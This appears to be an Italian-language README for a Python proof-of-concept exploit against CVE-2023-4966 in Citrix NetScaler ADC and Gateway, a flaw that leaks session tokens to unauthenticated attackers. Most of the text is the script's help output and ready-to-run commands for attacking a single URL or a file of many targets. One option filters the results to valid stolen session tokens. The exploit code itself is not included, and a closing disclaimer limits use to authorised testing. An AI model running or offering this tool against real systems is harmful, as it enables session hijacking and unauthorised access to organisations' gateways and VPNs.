
Prova di concetto per la vulnerabilità NetScaler
Prova di concetto per la vulnerabilità NetScaler CVE-2023-4966
Questo script Python sfrutta CVE-2023-4966, una vulnerabilità critica nelle istanze Citrix ADC che consente a attaccanti non autenticati di divulgare token di sessione. Alla vulnerabilità è stato assegnato un punteggio CVSS di 9.4 ed è sfruttabile da remoto senza interazione dell'utente. I dispositivi Citrix NetScaler configurati come Gateway (server virtuale VPN, Proxy ICA, CVPN, Proxy RDP) o server virtuali AAA sono vulnerabili a questo attacco.
$ OPENSSL_CONF=./openssl.cnf python3.10 exploit.py -h
-u URL, --url URL Specifica il target Citrix ADC / Gateway (es. https://192.168.1.200).-f FILE, --file FILE Fornisci un file contenente un elenco di URL target (un URL per riga).-o OUTPUT, --output OUTPUT Specifica il file per salvare i risultati in output.-v, --verbose Abilita la modalità verbose.--only-valid Mostra solo i risultati con token di sessione validi.Per un singolo target:
$ OPENSSL_CONF=./openssl.cnf python3.10 exploit.py -u https://target.example.comPer più target elencati in un file:
$ OPENSSL_CONF=./openssl.cnf python3.10 exploit.py -f targets.txt --only-validQuesto script è fornito solo per scopi educativi e di ricerca. Usalo in modo responsabile e solo su sistemi per i quali hai il permesso di testare.
Senpaisamp, Italia